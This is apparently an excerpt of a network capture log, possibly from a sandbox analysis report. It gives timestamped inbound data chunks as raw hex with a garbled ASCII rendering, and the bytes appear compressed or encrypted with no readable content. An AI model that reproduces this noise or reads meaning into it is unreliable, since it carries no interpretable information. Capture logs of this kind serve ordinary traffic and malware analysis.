                                                                                                                                                            2022-09-29 12:45:06 UTC13122INData Raw: d7 70 c7 22 08 1c 80 54 79 de 9a f3 00 4d 93 86 3e 4f 95 9a e7 45 63 b8 91 df f3 96 98 2c 24 b4 f2 74 8c 31 2b df ab 03 42 35 1b 90 b0 92 81 2e a3 44 ba 69 2d 89 73 ed 74 18 88 ac c3 d5 62 06 fd a6 26 14 79 bb 4d d2 cc a6 64 f7 e5 39 cd f6 e4 d4 18 16 25 23 b8 40 8c 25 ea 8b 6c 98 fe de 6c cb 41 ab 2c b8 9e a2 b5 84 f3 f7 c7 ba d6 1f 8d f6 02 63 dc 1f 7e c1 4d 15 2c 0f 6e ee ca 88 6e 11 4a 2c 96 6d 68 96 46 67 38 c4 6b 73 40 44 52 63 a7 74 70 a8 c4 6d 36 90 e5 c7 e8 d8 f4 26 12 ba f7 eb 2c 24 46 a4 6b f5 e7 23 41 74 d2 cf 7e d0 3f 17 c6 e2 a0 8c 6b cb 38 77 83 76 b5 75 b0 0b ae 22 d6 c7 8e fa 57 0a 09 ce b5 fb 37 36 9b 3e a5 cc 11 be 77 01 2d e9 66 c6 32 92 8f 49 8f 44 a8 95 43 22 f5 57 bf dc 69 4b 80 d5 bd f4 de 1e 0d fb c7 2e 3d 9f 02 52 7c aa 63 aa 95
                                                                                                                                                            Data Ascii: p"TyM>OEc,$t1+B5.Di-stb&yMd9%#@%llA,c~M,nnJ,mhFg8ks@DRctpm6&,$Fk#At~?k8wvu"W76>w-f2IDC"WiK.=R|c
                                                                                                                                                            2022-09-29 12:45:06 UTC13138INData Raw: 72 d8 07 aa e6 12 66 b1 01 62 8f fc 02 43 c4 f9 c1 c1 0f 67 be 96 99 ac d9 22 77 e6 f3 cf 96 87 4c 9d 56 f3 b1 cf d2 df 37 a4 fe 5a 75 2d 96 59 5a 48 58 f3 0a a2 da 11 80 96 89 47 15 26 98 29 57 0a de d1 f0 2e 82 99 d0 4b cc 09 9a ec ef c5 b7 d3 df 48 7c 8a 45 e0 2d 70 15 b0 15 7b e8 4b 29 dc d4 7f 18 f5 da 3f 99 dd a1 b7 10 0f 76 60 61 aa 8d c0 b4 93 6d 6d b3 bf c9 7b 40 b6 21 d0 03 d8 6e 77 7b 76 bc 65 3a 8d 50 62 b3 c8 31 1f e1 eb a0 f9 97 9d a7 b1 b9 c7 5f 91 59 2f 1c 06 69 bb 2a 17 e4 dd 80 69 23 80 2d 29 03 62 12 d0 a6 82 94 78 02 ca 64 c4 b5 0d d5 88 fa 43 9c 80 ac 92 4a a4 7c 49 35 bc f2 d0 97 f6 a2 c7 5f 79 46 ab c2 bf fd ec 14 58 0c f2 58 49 39 4f 8d 69 f2 7e ba 04 c4 d8 60 17 9e db f9 53 15 cb d8 22 7e 12 4a a3 4a 6d 06 59 e3 ff d0 e6 6e 2b 95
                                                                                                                                                            Data Ascii: rfbCg"wLV7Zu-YZHXG&)W.KH|E-p{K)?v`amm{@!nw{ve:Pb1_Y/i*i#-)bxdCJ|I5_yFXXI9Oi~`S"~JJmYn+
                                                                                                                                                            2022-09-29 12:45:06 UTC13154INData Raw: ba 2f 3c d6 a1 cc 05 d6 25 48 ff 1b 51 30 9b be 51 82 a6 6e 69 4b c0 82 b7 24 95 18 ba 24 43 47 59 83 48 ed 4b c4 e3 7a 50 14 85 34 c0 27 d2 11 c0 db 37 e8 42 db 8b 4b 02 7b 8d 70 7a 63 f1 67 a3 75 2f 8b b4 4c 65 d2 c9 82 54 a0 79 6c 53 9b e0 4d 39 3a ac e2 5c 97 90 70 ca d2 6a 26 19 a9 09 5f 48 c7 cb 0e c4 9b d2 7d 47 36 eb da 53 4b 1e a9 dc 06 9c 02 56 96 8c 75 e5 a8 ec e5 aa ab 43 43 54 55 07 57 52 64 0d 6c 1a af 82 0e 52 62 e2 99 0d 3e 4f dd 40 55 95 73 64 10 b0 d1 e4 52 c7 c7 a6 f1 2b 24 60 25 0d eb af 69 55 c5 eb 38 9a 99 f6 2e 1b 13 7c f1 98 c7 ba 9e bd 4b 29 cb c6 cc 1b 80 7e e9 97 f5 b9 9c 2b 6a a3 1a 4a 7d f9 d7 72 7c bd b3 0f 7e c8 28 d9 d1 9c 40 86 fb 4f a2 47 d3 1f 5a 46 56 b0 ab b2 f1 8e f0 b9 07 0a d9 a4 f3 ed 5e b7 18 47 c8 23 07 88 de 50
                                                                                                                                                            Data Ascii: /<%HQ0QniK$$CGYHKzP4'7BK{pzcgu/LeTylSM9:\pj&_H}G6SKVuCCTUWRdlRb>O@UsdR+$`%iU8.|K)~+jJ}r|~(@OGZFV^G#P
                                                                                                                                                            2022-09-29 12:45:06 UTC13170INData Raw: ef d3 9d ff 24 6b d3 66 c2 4b 81 43 c7 e4 be 5e bd a2 ac 5a 8f fa 3c 9d 55 aa 27 76 af 36 b5 15 d0 6c 46 4d 95 bb ba bd 43 68 69 23 d6 f0 19 d5 27 82 b2 5d 5f 7c c5 6e 36 65 0d c6 4d 19 71 1c 9e 69 d3 80 02 78 30 55 fd 74 5d 51 bc e2 76 53 d6 2a cd 8f bb 68 a7 b5 32 15 ba e6 6e ad 70 6f 9d d2 c8 3e 1a bd 49 b7 39 a2 10 f3 d4 2c f6 8b 78 93 a9 e8 0a d4 59 14 b8 e9 4d 5c 74 e0 86 c3 ea b0 44 b0 94 0b 8d 63 31 79 28 d9 07 2d 93 c8 9a c7 37 ef c3 5a 62 25 a0 f7 c2 c9 36 5d 0e 44 64 6f d0 72 2a 87 04 8a 11 6b 61 cd 52 3d ec 63 5f 5f a2 3f c3 17 6b c6 33 b0 8c 5a a9 7a ce f5 89 db 01 43 f6 02 b3 c0 b7 77 62 d4 cc cd b0 dd 3e 98 55 aa 23 85 d1 7c f8 35 0d df 7d 0d ed 0c 5b 69 aa 83 f3 b7 5d 0e dd de 3e 01 3b 98 c7 51 58 1d f6 dc a9 e6 f9 c0 07 be c3 48 94 80 89
                                                                                                                                                            Data Ascii: $kfKC^Z<U'v6lFMChi#']_|n6eMqix0Ut]QvS*h2npo>I9,xYM\tDc1y(-7Zb%6]Ddor*kaR=c__?k3ZzCwb>U#|5}[i]>;QXH
                                                                                                                                                            2022-09-29 12:45:06 UTC13186INData Raw: ca 53 9f 68 fe a0 91 ac b9 73 0c a9 dc 20 25 78 11 65 e3 d5 f3 96 cf 83 eb 0e df ec 7a e5 cd 2e 7f 5e e8 64 29 d1 b1 de 4f f4 3b f9 52 0c 59 0d a0 f0 bd fa a9 4a 1b 61 7c 6e c8 fe 4b 80 f5 ba a4 da 14 d6 23 8d 81 1b 4c 64 de b9 04 bc 71 ec ee 16 7c f8 fb 65 5f 49 ea 17 6d 29 a2 84 a1 b2 fa ed 19 b3 0e 5b 62 99 25 58 fb f1 e3 0e d1 e1 d3 a5 d5 88 a2 41 26 aa 7f c3 de 45 2c 71 0f ba 97 20 7b 29 ff 84 bf 0a db 13 0c 1f 9c b2 e8 71 10 50 1a a5 5b d6 36 5f 1e 1d f3 ad e1 43 ae 17 ae 08 f8 e4 57 bb 4c 79 d0 a4 d7 b5 56 a8 d3 c9 9c 01 b8 47 52 7f 7a 4a ec 7a 95 7a 14 53 cd 41 8d c6 50 7d 95 47 9f c6 69 46 c4 5f 3e ce 31 d1 9e 8d 2e 58 cd 6c ac fe 48 9b a6 bb e2 aa 35 f9 a4 43 5b 11 f0 7b 47 09 0f 41 d4 45 57 f8 d1 92 92 4b a9 02 f5 67 45 c5 da 4a 5f 8b 17 80 08
                                                                                                                                                            Data Ascii: Shs %xez.^d)O;RYJa|nK#Ldq|e_Im)[b%XA&E,q {)qP[6_CWLyVGRzJzzSAP}GiF_>1.XlH5C[{GAEWKgEJ_
                                                                                                                                                            2022-09-29 12:45:06 UTC13202INData Raw: cb 0d 79 7c 8a a1 b2 ea 1e f8 05 d9 0b 1c d4 35 a7 2f 1f bf b5 a4 fa 5d 21 a3 38 87 66 76 a9 a5 ae 23 8b 4f 9d a2 00 0d 06 38 c9 f0 87 66 de a9 e7 21 49 44 3c 93 f9 0a 31 1e 88 7e 9d fe f8 f3 ef 08 9d 55 77 c4 6d 38 39 8e 01 11 65 55 61 f4 c8 16 a0 e1 05 13 eb 4a 98 39 2b bb 18 a3 d1 db df db 84 fb d5 a9 c1 e4 de 7e b2 04 a0 ec 4c 05 a4 56 82 40 14 6b c3 93 d3 9b 40 2c 44 03 fc 11 3a e1 18 76 69 be b4 e7 8d 38 61 3d 95 01 39 d8 2b 57 7c 5a 97 da ed 77 6b a1 b1 77 ff 2f 07 e3 fd 27 18 d3 2e 4a d0 62 67 af 0a 12 7b b6 15 88 bd a0 c2 19 b3 5b dc 83 1f 41 bf 7a 93 50 f3 4c 80 06 f8 ce 1a 60 06 c7 7e fe ce 8d 8b 42 38 f5 9f 71 66 e7 83 8d e3 6f 17 8e 6c 42 24 29 df fb 19 1f c9 41 63 07 6b c2 b6 99 9f 22 02 fb 8e a5 c2 4d 2a 49 1c 13 3e 24 66 79 b3 a8 ec 9d 3b
                                                                                                                                                            Data Ascii: y|5/]!8fv#O8f!ID<1~Uwm89eUaJ9+~LV@k@,D:vi8a=9+W|Zwkw/'.Jbg{[AzPL`~B8qfolB$)Ack"M*I>$fy;
                                                                                                                                                            2022-09-29 12:45:06 UTC13218INData Raw: 0f 8e 3e 93 19 6a 3e 83 71 8f bf ab 11 28 48 64 33 ac 82 d8 7b 25 f7 e4 e5 3b 6e 49 41 9d fd bf c9 2a c2 87 70 c1 3e 24 67 dd de 4b 64 71 d2 a5 fb 38 cd 1b 1a 74 95 10 35 ba f2 0c 74 1d 1c 33 88 e6 8f ed 21 e9 69 77 89 43 7d 5c 36 c7 4d aa 4d 33 83 7b a0 0f d3 25 9a 1e f0 5b 6e d9 bf b4 71 1d 46 40 74 6d 35 f7 ff a7 1b 2a ce 84 76 73 b5 16 cb 71 4c 71 75 92 94 d1 3b 42 14 42 eb 23 a0 88 25 2b b4 2f cc 52 a7 bf e7 10 9b f3 c7 c1 77 00 47 c2 26 e8 02 33 c3 ee a0 76 7c 46 a4 20 ca e5 64 b1 7f 98 a5 b4 a3 8a 08 c8 0e ba 4e c5 cb 98 1b 2d 54 9e 61 b1 01 e8 8a 92 8b 7e 07 80 7b 32 81 ec 01 aa a6 69 90 29 58 e1 55 08 bf ab c7 19 f0 e3 d9 42 31 14 53 c1 59 d0 3a 46 ec 3b 00 4e 03 ca d6 23 c2 76 ac 1f 7c 27 72 88 5c 90 7d e0 3b 8c 08 1c c8 08 ce 80 df 6b e8 83 39
                                                                                                                                                            Data Ascii: >j>q(Hd3{%;nIA*p>$gKdq8t5t3!iwC}\6MM3{%[nqF@tm5*vsqLqu;BB#%+/RwG&3v|F dN-Ta~{2i)XUB1SY:F;N#v|'r\};k9
                                                                                                                                                            2022-09-29 12:45:06 UTC13234INData Raw: 64 6f cb d1 4b 44 4a 65 8d 3a c2 05 d2 b0 31 40 9c 20 29 2b 55 22 d1 61 26 58 7c ef ca 13 52 dc ec 8e 83 03 9a 38 50 42 7b d0 59 6d 25 e4 42 0b e7 c5 33 77 41 60 a2 a2 93 f2 c1 11 ef 24 61 8e 34 32 58 f1 98 44 19 e6 b5 e0 28 c6 90 33 50 83 8c b7 42 76 a8 51 1c f6 24 b6 67 8b 99 ae 79 94 78 4b 47 27 c1 06 8e dc 65 df 9f 07 41 17 bd 2f ec bd e5 04 86 1a 88 11 78 7b fb 55 05 e7 72 56 02 35 63 38 02 98 7d 43 2b c1 ef 5a c0 62 aa 3f 54 cc d3 d2 8e cd fa a8 30 3d a5 0d 28 31 53 93 bb 4f 11 e5 8b e6 c1 1a 02 03 df 65 94 3a 90 37 57 e1 ea 5e 60 10 0d d3 34 3e 20 3e 2b 9e 09 48 c0 63 80 b4 bb 26 2a 7e 25 3f 62 ca 1d b9 2e 56 78 dc 31 76 71 00 80 dd 75 26 24 14 28 2a 9a 0d c5 fd 6a d9 1f ca ee f8 2f 34 d4 ea 2a ec ac 89 7c ea 03 9a b9 71 18 b6 7a 82 48 74 79 fa b4
                                                                                                                                                            Data Ascii: doKDJe:1@ )+U"a&X|R8PB{Ym%B3wA`$a42XD(3PBvQ$gyxKG'eA/x{UrV5c8}C+Zb?T0=(1SOe:7W^`4> >+Hc&*~%?b.Vx1vqu&$(*j/4*|qzHty
                                                                                                                                                            2022-09-29 12:45:06 UTC13250INData Raw: c4 27 b9 94 08 9e 8f 70 fb e5 94 96 00 44 f4 97 ba 2c c1 07 01 05 0e 20 92 df 1e aa 1a 63 be ba df 85 d7 24 99 1b ab 3d 08 c5 5a 2f a6 fc 77 06 a1 21 e0 63 fe 63 29 0e 3e c8 55 bf de 26 d5 37 21 07 37 01 88 d9 83 14 26 b3 a5 cf 60 33 4d 68 f7 f6 16 b2 c7 ac 3d cc f4 68 e0 a7 a5 3c 7c 47 a8 d6 9c 54 ad 50 ff aa 7e 8f bf 07 93 b9 b1 39 a0 d7 54 00 14 f4 fd e1 f0 c1 ad 63 0d 89 e8 02 20 ef 3c f9 90 28 9e bb 5e 58 7a fd 17 cf 57 1e b0 5b 0a 5e 3e 29 99 35 cd 90 a1 7b b9 de 50 02 43 b8 87 38 6a 28 c2 ee 1f c5 5a c2 12 8c 80 3d 18 ca 6b c9 d3 31 fa 36 28 22 de 88 2e 02 60 d5 2e bd 16 b7 5d 81 24 03 2c 0a 7e e0 e4 eb f6 ec 88 fd 08 40 9d c8 b3 81 71 1a ea 30 9a 5c af 2f d0 1c 4a d2 a8 2d 5c 10 76 26 99 c0 95 92 6e b9 cb a0 0a 64 d6 98 d6 7e 11 66 aa 37 96 db ec
                                                                                                                                                            Data Ascii: 'pD, c$=Z/w!cc)>U&7!7&`3Mh=h<|GTP~9Tc <(^XzW[^>)5{PC8j(Z=k16(".`.]$,~@q0\/J-\v&nd~f7
                                                                                                                                                            2022-09-29 12:45:06 UTC13266INData Raw: 08 68 df f1 80 3a bd 21 37 f0 52 8c ff 92 3b 08 92 5e 61 73 6b 1e 0c 26 0f d0 55 ce 1f 55 0f 37 c4 54 00 8c 4a f0 40 d7 1e 1a 9e 78 86 3b 0d b0 1b 80 35 35 8f a6 6b b4 60 97 a7 c6 80 b7 03 d3 66 b6 69 ad ec 4b de 9c 7f 59 c0 06 e0 a5 f7 f7 95 18 25 69 3b c7 a7 7c ce 08 51 27 0b 16 1c fa f1 ef ba 3d 31 d6 77 90 dc 55 cc 2c 33 b2 cc 5c 28 4d 66 3e cb e6 31 8d ea f7 d2 55 59 e2 3b 12 13 82 94 d8 16 7c 35 5c 19 6c 87 0f 7f 7d 92 35 46 f4 7b df 7d c1 15 9a 11 f5 a5 04 27 b2 96 b7 d6 47 22 fe d2 6e 59 7f 63 af 4e 0d 1f 0d a1 e6 0a b5 23 6d 65 7a 43 60 de ed 98 99 dd 45 96 e9 ce 2e b6 d5 a7 80 58 df 7f c2 db f5 e9 8e 58 6c 64 2b 24 63 f2 cd 86 66 a0 39 6a 87 6d 85 46 5a 0f 93 17 26 36 ad ad 2e f9 ce 63 68 1d 46 7e 12 e0 80 39 f2 c7 14 55 b1 fe 0f ee da f5 55 24
                                                                                                                                                            Data Ascii: h:!7R;^ask&UU7TJ@x;55k`fiKY%i;|Q'=1wU,3\(Mf>1UY;|5\l}5F{}'G"nYcN#mezC`E.XXld+$cf9jmFZ&6.chF~9UU$
                                                                                                                                                            2022-09-29 12:45:06 UTC13282INData Raw: 46 3a d2 98 0d fb 37 3e a5 d3 d8 ae 09 2a 36 02 56 9a 0d 0f d9 3f 43 1e a1 dd 00 c1 18 0f 84 af 3c ce f7 e1 78 31 66 b4 57 7b df a1 d6 61 0a db c5 7a 13 fe 0f 05 88 0e 58 ad c6 b5 6e fd 84 5f b8 0b cf 02 3a 47 5b 53 74 23 66 7c 00 3a 84 c4 a2 0d 21 b0 d5 c4 0a 99 93 de 20 b0 14 59 03 b4 5e 5b cd 16 0d 0f 8e d1 c4 03 52 fb 2b 38 95 fc e6 31 26 b9 03 61 21 48 39 94 57 0b d8 4a 5c 0e e2 39 62 fb e5 53 8b 85 91 f8 13 27 07 0b 78 f0 a5 53 23 4d f9 de ef 25 18 4c 85 d7 4f 40 5e 18 7b 82 29 1a 4e 30 c9 90 b7 56 70 c6 a1 02 16 e2 9c b6 1b ee 91 d0 f5 f0 9d 33 d8 c9 94 21 d0 c3 b3 26 94 2c b1 79 da 28 73 82 d2 22 c8 fa 2c a5 92 9d c8 2e f7 1c f9 5f b3 6d 92 18 92 6e a7 b7 f0 26 37 35 1b 57 14 7d 4b be 65 26 81 ab be 8b b0 a7 98 0a 99 63 75 f2 9a dd fe eb 41 45 b1
                                                                                                                                                            Data Ascii: F:7>*6V?C<x1fW{azXn_:G[St#f|:! Y^[R+81&a!H9WJ\9bS'xS#M%LO@^{)N0Vp3!&,y(s",._mn&75W}Ke&cuAE
                                                                                                                                                            2022-09-29 12:45:06 UTC13298INData Raw: 99 ea 09 de 50 2c 0f 5d ef e7 5b ff 7e 92 14 a7 79 fd 8c 44 c9 cd 7d 5c 2b 82 ac 29 34 9e 01 dd 13 1e ca 2d 24 9c b6 7d 88 42 b1 7e a6 08 18 c8 8e b8 a9 95 fe 2e d9 9e bb 37 94 d3 e7 f9 40 c8 49 8a 97 fd ac d4 f9 58 f6 61 cd e9 be 5b ee 5f a4 0f 71 a8 82 8e 32 f7 35 3f 12 ad 35 06 5e f4 53 b9 59 dc 8f 1b 0e 36 7f d9 a8 c2 77 ad 40 93 64 21 c7 d3 cd 3b cc be 05 68 ae 7a 62 ef 2c 66 34 70 aa 75 f6 32 1b 72 87 71 d7 1c 09 37 7c bd 20 54 46 2b 4c 8c c4 04 5f f4 ff 25 a3 c1 fd 48 8f cc b6 52 ae 39 22 04 c9 ef 33 a3 9d 37 e3 69 9b af b0 14 cd d6 b6 ad 8c 00 23 c9 9a 83 69 23 e0 3e 19 74 ee 71 b4 59 7c 8c ad d8 26 3d f3 df e7 01 b8 d1 77 2e b4 ed 7b 87 41 47 eb 79 50 14 5a 46 d4 e6 e9 52 5c 3f a7 84 31 ff 2b 29 20 fa 5b 9a 65 5b 7c 74 ef 70 24 44 0c 58 6e 05 ec
                                                                                                                                                            Data Ascii: P,][~yD}\+)4-$}B~.7@IXa[_q25?5^SY6w@d!;hzb,f4pu2rq7| TF+L_%HR9"37i#i#>tqY|&=w.{AGyPZFR\?1+) [e[|tp$DXn
                                                                                                                                                            2022-09-29 12:45:06 UTC13314INData Raw: 97 91 f1 c4 1d ac 30 01 43 95 2b 38 e6 d4 f4 6f 24 a1 75 dd a3 ab 4a 6f d8 8d d2 74 d1 8e fb cc 75 1a 54 78 9d 05 1e c3 0f db b5 3a b7 33 92 28 f3 5d d3 28 87 ea ed 79 7f 6a f9 f5 5d 1d 99 6f de c1 bd 73 40 34 51 20 04 ff 8f d7 3e 77 cb 25 24 03 c7 44 12 18 f5 a9 7e 41 54 fa cc 70 9b 8c da 92 29 88 03 e8 fa 78 0a bf 0b fa f0 08 5c bc 4d 11 f2 ee d6 0d 28 ad 04 c8 63 c7 d7 dd f5 44 82 1b a2 0c 6d 09 3a 96 51 44 fb 91 d2 b9 42 7b 6d 90 53 4b 0b 83 3a f2 aa bd b6 7f 59 71 6a fa 3f ad 85 54 1f 7a b2 02 0a d3 7e 35 a6 0a 6d bb 98 2a db c5 d2 c5 d2 8b a6 11 e8 91 69 f4 d4 b1 43 59 5d d3 ec 98 dd b1 6c 7e 7b 53 2a ec 17 81 9e 7a 21 27 af ae 0d 8c c6 45 ac 24 9c 48 96 71 55 8d 7c b5 53 e6 b8 21 fa f9 0c bf 34 52 77 c3 05 d1 9e 59 15 84 32 d1 2d 20 47 4d 6e 10 0b
                                                                                                                                                            Data Ascii: 0C+8o$uJotuTx:3(](yj]os@4Q >w%$D~ATp)x\M(cDm:QDB{mSK:Yqj?Tz~5m*iCY]l~{S*z!'E$HqU|S!4RwY2- GMn
                                                                                                                                                            2022-09-29 12:45:06 UTC13330INData Raw: f0 39 80 fb 7d a6 23 c4 ea 88 63 eb 8c 3d 39 e1 12 80 7c 04 75 2c a7 e3 88 ee f8 5a 22 88 bf 23 15 a0 4c de f4 f5 f7 c6 90 d5 df b1 ed 5b 95 89 f3 ba 14 34 8e 48 0d 53 a4 37 71 9a bb 60 b3 70 09 8c 0f 33 60 14 2e de 19 c3 10 5d 79 a6 30 3b f4 dd f9 17 c0 65 3c 01 7b 57 9e c9 44 82 83 76 9d da 04 12 92 1d 49 df b1 8a 95 e1 dd d9 91 03 13 2d c2 7e 77 70 0e fc f2 08 a6 bf f9 a3 a3 73 c8 30 19 c7 18 b0 16 b6 ee 55 00 0b 3a 57 d3 4c 41 09 00 a3 f3 ab fa dd e5 7d b0 8c 80 5b 5b 2f c7 f5 83 dd 8f 88 13 22 d6 66 d6 a5 fb eb eb 70 8d ec b7 0e 18 3d 16 1d 8c cb 51 1f 34 2c 6d df 9c 85 22 51 4f 39 a2 53 79 2d ee e7 c8 d0 59 db 74 c2 03 b4 cb 65 b1 f7 f6 94 47 40 f1 f3 eb 4b ca 37 bd 11 f3 a6 4d eb 74 bd 42 62 41 4c 14 0f 27 5c 5e 8a 9d 5f f5 89 a5 d0 66 0b 6a 6a 2e
                                                                                                                                                            Data Ascii: 9}#c=9|u,Z"#L[4HS7q`p3`.]y0;e<{WDvI-~wps0U:WLA}[[/"fp=Q4,m"QO9Sy-YteG@K7MtBbAL'\^_fjj.
                                                                                                                                                            2022-09-29 12:45:06 UTC13346INData Raw: b9 8f 0c 02 eb 49 d4 28 f0 1e a1 34 33 01 de ad 40 d2 40 ae 79 03 6c a8 ec da a1 f9 53 67 9b 06 70 e9 42 91 f4 b6 02 95 d1 81 57 ce 38 b8 88 4c 4e 7b 99 45 54 1b 3b 68 bb 82 07 2a 0b 03 91 54 af 3d 37 7a a7 da f9 56 2c e8 f6 71 50 f7 ea 68 0e 0a 85 ba 97 de 88 a5 d0 72 15 95 c1 06 4d 13 e0 e9 47 aa c1 5d 03 1f 5b 62 00 eb 3d 87 75 e6 43 a0 1c 53 b0 25 a2 cf 5f e5 9e 1b 08 68 aa 58 a7 1b e3 58 a9 93 52 cf 83 59 50 8b 53 45 a8 44 1d 84 f5 fb ab 66 be 32 f6 48 5b 2b 58 6c 52 b7 87 c1 c5 6b 0a c8 9f 1f 07 52 18 4f 9b 10 8d 52 a6 da dd 0f 32 87 f2 d1 c3 23 b0 79 c5 ac 82 4f 5b dd ca 51 c9 b7 3a 23 35 79 ff 44 c9 76 4b ad 26 a9 c1 3c 3b 00 cd fd ab 4c 0a 57 9f 9c fa b1 76 22 2d 9d 8f 23 10 2c 3a d4 5b 98 5e 67 a0 73 6c f5 0e 54 c7 ae 90 27 7c 09 09 a7 54 18 f3
                                                                                                                                                            Data Ascii: I(43@@ylSgpBW8LN{ET;h*T=7zV,qPhrMG][b=uCS%_hXXRYPSEDf2H[+XlRkROR2#yO[Q:#5yDvK&<;LWv"-#,:[^gslT'|T
                                                                                                                                                            2022-09-29 12:45:06 UTC13362INData Raw: 26 88 ee e6 9c e5 d2 f7 b4 b4 10 b0 17 99 a8 39 ae 3e 3e 98 a0 30 33 89 10 5c 1f a5 b8 b7 c0 c0 00 93 36 df 9b 49 10 96 e6 a2 87 01 36 b5 7d 29 99 9a 41 6d 6d d4 83 73 1e 0f ad 0c 51 f7 de f4 f9 a5 6f 5c fd 77 da ea 27 21 65 36 c8 a9 8a ac b6 d2 56 a0 f7 67 7d 35 20 c1 87 74 23 0a 89 39 31 36 86 95 a1 0d 12 2e 69 a1 79 cd 84 8b 02 1b 04 53 3f ed 5b 71 72 c6 d6 63 01 df 9c 2a 3f 73 b3 3c 1c 38 23 27 f9 63 cc 37 bb 9f 84 e1 71 6e fe a3 70 61 2c 13 a0 ec 6a 2a b6 16 ff ca 80 52 40 84 53 95 d8 8a ad 83 4d f5 7a 6e 1f f5 a9 08 e3 23 13 b1 1e 71 51 5c 5b 3d 94 b5 8c 70 8f f5 4a ff 74 22 0d ee 12 46 fd 16 af 0d 3d 30 ac 69 78 51 66 82 8c ea 27 b2 86 29 94 9e 8d 89 70 5e db fd 40 93 3a 87 80 83 e2 ae 8a 86 ae 18 ef 77 20 54 ce d0 50 fc 5d 22 a6 93 17 5d 45 e4 13
                                                                                                                                                            Data Ascii: &9>>03\6I6})AmmsQo\w'!e6Vg}5 t#916.iyS?[qrc*?s<8#'c7qnpa,j*R@SMzn#qQ\[=pJt"F=0ixQf')p^@:w TP]"]E
                                                                                                                                                            2022-09-29 12:45:06 UTC13378INData Raw: b1 a8 0c a9 ef d9 11 f3 86 a1 fd d7 1c c8 fd 65 47 74 91 4a 74 c7 1b 0b 68 c4 c9 fe b8 ea cf f7 66 74 fe 4f 7c b4 b0 ad 18 b8 77 3b 44 e9 02 58 b1 29 9f e6 26 79 3c 5d 00 87 56 e5 0f 7a 19 5e 3f a1 e9 8f a3 90 a8 fa a3 54 17 e4 68 c0 69 8b b7 2a 38 c1 27 b2 c9 46 8d f1 d0 f7 65 74 5d d1 79 91 3a f5 d1 f3 32 39 0a 27 63 08 78 28 9f 2c 31 e9 d1 d2 72 e3 29 9a 8a 2b 96 bc 29 a3 e2 d1 4e 06 24 ca eb b9 55 c7 17 a3 60 91 d1 fb 59 cf 99 a1 56 c2 60 d1 c3 53 06 57 ae 58 3b 4c ac 0f ca 38 85 fd 9e 2f cf 53 68 29 0a 6a 2d 6b b3 7a fc 8f 80 19 86 10 4e 07 d9 4d 06 45 56 61 b9 a3 4b a3 04 af ed 73 7f 65 4e 53 c7 1f 0d aa 3c 65 96 e4 58 1f 40 98 47 c1 c3 70 b8 4e 42 84 c6 f7 5c 39 66 12 7e 7c 64 c2 46 f3 70 b3 74 80 51 cd ce 52 8b 2f 4a eb fc c0 19 12 4c 97 75 dc 20
                                                                                                                                                            Data Ascii: eGtJthftO|w;DX)&y<]Vz^?Thi*8'Fet]y:29'cx(,1r)+)N$U`YV`SWX;L8/Sh)j-kzNMEVaKseNS<eX@GpNB\9f~|dFptQR/JLu
                                                                                                                                                            2022-09-29 12:45:06 UTC13394INData Raw: a9 49 68 7b 7a f7 a2 25 a4 7b 30 74 4c 6e cd 01 d0 87 7c 21 f9 cd bc 57 5c 7d 10 3b f1 5f b4 ac a3 c0 30 1b 92 1c 19 58 be cf c8 82 b0 a8 ba 21 27 d0 5c 4e 08 91 e2 9f 3e 43 0b e1 bc 48 0e 20 a7 b2 71 43 b1 1e 1c 07 9f 2d b3 16 91 a7 f7 5a fc 9b 64 75 8a b4 38 91 34 f2 93 29 01 7d e5 72 65 ca 36 16 1b 73 ab bc 97 9e cc 1e 4a d6 9d d8 e2 b1 f4 18 2c 54 55 51 87 23 64 2f ce c1 4a fa dd 72 89 67 a5 02 54 31 cd 58 44 df 3d 33 b0 cd 0c 87 d5 f1 6c aa 91 fe ad 2c 0b 76 15 d1 ee 28 cf e6 41 7a c7 85 fb 0f ec 88 62 3d 96 05 4f 46 8d 08 bf 98 25 c8 7e ab b8 4c 2b 56 73 f5 df 6b 50 32 a6 1b a2 0a 6f 0a 40 d1 27 b1 6f 94 c4 1e 91 c8 26 43 0b b1 a7 c5 30 40 04 7e 33 77 d9 ac 0b 67 23 2c 10 4a e9 fd fc a2 e0 ed 47 18 28 8b 96 26 ce a2 fa ad 8b 9e 23 77 88 b5 0b d4 b3
                                                                                                                                                            Data Ascii: Ih{z%{0tLn|!W\};_0X!'\N>CH qC-Zdu84)}re6sJ,TUQ#d/JrgT1XD=3l,v(Azb=OF%~L+VskP2o@'o&C0@~3wg#,JG(&#w
                                                                                                                                                            2022-09-29 12:45:06 UTC13410INData Raw: a6 ab 2f 16 a2 7a e3 e6 be b0 68 d9 d3 df e6 b0 6d f3 a0 4a 1a 34 b1 79 84 e8 1e e6 f4 a2 f2 33 64 44 6f 06 51 9f 4c 3f b1 58 10 b3 c4 5d 48 db 7e 3f 37 42 c1 9f 42 d5 82 95 96 ae 1e 05 fb 55 e4 39 30 de 06 4d fd f5 76 00 68 57 5f ed d8 1b 1a 5a f4 32 67 56 b2 66 c3 cf f2 9b 7b 76 17 7b 02 f7 36 a2 54 ff 97 5d c1 9b 55 3d 8a 5d a6 c0 f8 bf 11 54 d0 76 34 4b 2c 4a 47 25 ad 3b 9e 1d 9a fe 85 0b 3f e8 39 46 6e 73 8a 68 a5 82 bd ab 44 69 44 09 4c 7a c4 73 8c 3e b2 3d 1e e6 78 76 9f a6 3a ad 93 7f 5c 79 f0 20 5f 04 cd c3 2a 01 36 4f 54 90 ea 22 6d a6 8a 79 04 01 ef f0 e2 5d ed 01 ea e0 a7 3e ec 8f 2e ea d9 68 2b 80 10 78 ea 32 c0 66 da 6d 72 55 e3 e5 6d 01 02 f1 4c 11 86 bc 08 f0 39 cf ef b1 2d d9 fd be 3f 8d 42 c8 81 27 76 1b 23 92 8d eb 8a 6c b8 f9 05 bb bc
                                                                                                                                                            Data Ascii: /zhmJ4y3dDoQL?X]H~?7BBU90MvhW_Z2gVf{v{6T]U=]Tv4K,JG%;?9FnshDiDLzs>=xv:\y _*6OT"my]>.h+x2fmrUmL9-?B'v#l
